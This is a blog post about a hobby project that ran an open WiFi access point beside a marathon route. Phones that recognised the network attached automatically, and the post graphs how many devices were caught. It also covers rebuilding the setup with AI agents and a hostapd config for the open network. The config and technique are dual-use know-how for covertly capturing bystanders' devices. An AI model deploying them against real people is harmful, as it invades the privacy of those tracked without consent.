This project worked because carriers have a “WiFi offload” strategy. Unlimited data is relatively new, and carriers were still scrambling to provide transport that met customer demand. Phones have been tuned to attach to recognized networks in order to offload metered traffic. I suspect that some day data caps will be reintroduced thanks to the popularity of 4k streams on 3-inch displays. Time will tell.

There is another fun property of my data! I can graph the attachment rate of runners passing during the marathon. The slope is steep when we’re at the start of the race. Competitive runners quickly disappear and the slope goes gradual. Our graph is pretty boring till we get to the end of the marathon. Is this because the slowest runners don’t give up?

NO! There’s a 10k happening as well, and it happens to turn around at the end of the trestle. The slope in our graph declines because the 10k participants start showing up. Short races are more popular! We see a much steadier rate of attaches as a result. As we move to the right, the marathoners are on their return. The tangent-like shape isn’t because of runner resilience- it shows that the steepest slopes represent folks doing harder things.

The run spanned two days. The second day was rainy, which significantly dampened participation:

On day 1 I caught about 155 devices, but day 2 only brought us about 40.

This was a fun project- but it was scrappy. When I started off, I didn’t really know how to configure hostapd or dnsmasq. I had to figure out a bunch of implementation details on the fly. I didn’t document my project. It took several weeks, and I was lucky: I had enough saved logs and sed magic to generate a cool-looking set of graphs. But compiling the WiFi drivers was a pain. My setup had to be in close proximity to the race because the antenna set was not optimized for outdoor transmission. It was not a reproducible project- and it certainly wasn’t stable.

2025

The annual Blerch marathon ran past my house earlier this month.

Four days before the event, I put a challenge in front of myself: create a reproducible version of the ‘catcher’ project using my LLM-supported automation.

I’m more experienced now and, consequently, less interested in proving vulnerabilities. I’d prefer to build enduring solutions. In this case, my goal is rapid delivery of IoT prototypes and projects. Anecdotally, I’ve heard that a first iteration of a complex IoT prototype takes 3 to 9 months. I would consider developing a project requirements doc, implementing code, implementing unit & integration tests, and delivering a working implementation to be in scope for the first run of a prototype. Keep in mind: there’s considerably more work involved to get from concept to market.

I’ve been building my own custom AI “agents” for almost a year. I’ve developed some intuition about which tools are useful for quickly building firmware images. I’ve recently started experimenting with agents that actually deploy and troubleshoot deployments. It’s been working so well that it’s starting to feel weird- building complex hardware systems shouldn’t be this fast. I suspect I can turn a device around in a single day.

My “Win conditions” are more about creating a reproducible project than proving vulns. I want to prove that I can quickly turn around a complex project prototype. “Complex” in this case means we include peripherals and inter-component integration. This boils down to three goals:

  1. Demonstrate the implementation of an external WiFi adapter for vending the WiFi network. This requires autonomous troubleshooting and configuration of the wireless stack. There are complex design and implementation decisions that come with activating AP mode, and an AI agent can speed-run that process. It would also demonstrate an agent’s ability to troubleshoot driver compilation errors.
  2. Implement an e-paper (“paperwhite”) display that presents the status of the Pi, including the status of the WiFi network and any attached devices. Most IoT has some kind of interface that people will interact with, and I wanted to demonstrate that a peripheral-based UI can be implemented with agents.
  3. Implement the whole project via custom deployment & troubleshooting agents. When I did this last time, I was in my office on weekends and evenings at the expense of spending time with my kids. I wanted to wield my AI towards productivity gains.
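
Activating AP mode (goal 1) ultimately lands in a hostapd configuration like the sketch below. The interface, SSID, and channel are placeholders, and the network stays open (no WPA) to match the original catcher setup:

```shell
# Write a minimal open-AP hostapd config (placeholder values throughout)
cat > hostapd-ap.conf <<'EOF'
# the external WiFi adapter, driven through the standard Linux nl80211 interface
interface=wlan1
driver=nl80211
ssid=ExamplePublicSSID
# 2.4 GHz, channel 6 -- a common default, not a tuned choice
hw_mode=g
channel=6
# open authentication: no passphrase, so recognizing phones attach automatically
auth_algs=1
EOF
```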

How did it work out? Hit refresh for about a week and I’ll include a link to Part 2!

Agent Driven Software Troubleshooting

Welp- I experienced an unanticipated error in nodogsplash on a build:
This is an ansible-playbook installation task screenshot showing the compilation error.

So I sent my agent after it. I fed a Claude session a troubleshooting prompt, directed it to review the source code in the directory, and gave it permission to ssh into the recipient image that was failing:

Cool to see my “AgentLessonsLearned” concept being explored. See this to get context on AgentLessonsLearned.

and then the agent made progress on identifying the root cause:

The agent tries to make a fix:

And now I validated that the fix works!

I resumed the build and the issue was fixed!


What does this mean?

  • I don’t have to parse difficult-to-read error messages to figure out the source of the problem.
  • I don’t have to do Google searches to troubleshoot exotic errors.
  • I get a document that tells me what problems were experienced, how they were diagnosed and how they were fixed. I get the lessons learned without the work.
  • I feel like I’m a little further up on the productivity asymptote.
  • Prototypes that used to take me over a month are done in a couple of days.

Is this cool to you? Connect with me on twitter (@patrickmccanna) with a project proposal for a raspberry pi. Feel free to add hardware like the pi sense hat or the Inky hat. Let’s see how quickly I can turn user requirements into a working prototype!

A little update on Agent-driven software development.

Today I’m testing a new version of my independent software deployment agent. It uses ansible orchestration to push software onto recipient systems so I can prototype with different software stacks.

The major change is that objectives are now structured and independent of the playbook creation process.

One innovation I’m playing with is creating a .AgentLessonsLearned directory in any directory where a file produces an error.

Agent Lessons Learned

We lose memory when we start new sessions. What if agents left notes for future agents so that the future agent has the wisdom obtained by past agents?

I’ve crafted a prompt that tells the agent to search for lessons learned files when they’re going to do some troubleshooting. If they don’t exist, it creates one for the bug it’s troubleshooting after it has implemented & validated a fix.
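
As a sketch, the convention might look something like this; the filename and fields are my assumed format, not a fixed schema:

```shell
# Drop a lessons-learned note next to the file that produced the error
mkdir -p .AgentLessonsLearned
cat > .AgentLessonsLearned/nodogsplash-compile-error.md <<'EOF'
# Lesson: nodogsplash compilation error
- Symptom: build failed during the ansible install task
- Root cause: (what the agent diagnosed)
- Fix: (the validated change)
- Validated: yes, the build was re-run successfully
EOF
```

A future session searching this directory gets the diagnosis for free instead of rediscovering it.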

I’ll report back to share how this works over time- but for now I’m very excited about this concept.